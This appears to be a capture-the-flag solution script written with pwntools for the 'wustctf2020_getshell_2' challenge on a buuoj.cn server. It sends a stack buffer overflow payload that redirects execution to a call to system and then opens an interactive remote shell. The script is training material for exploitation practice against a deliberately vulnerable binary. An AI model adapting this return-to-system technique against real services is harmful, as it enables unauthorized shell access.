1. #coding:utf-8
    2. from pwn import *
    3. context(os='linux',arch='i386',log_level='debug')
    4. io = remote("node4.buuoj.cn",29645)
    5. #io = process('./wustctf2020_getshell_2')
    6. elf = ELF('./wustctf2020_getshell_2')
    7. call_system = 0x08048529
    8. payload = b'a'*(0x18+4)+p32(call_system)+p32(0x08048670)
    9. io.send(payload)
    10. io.interactive()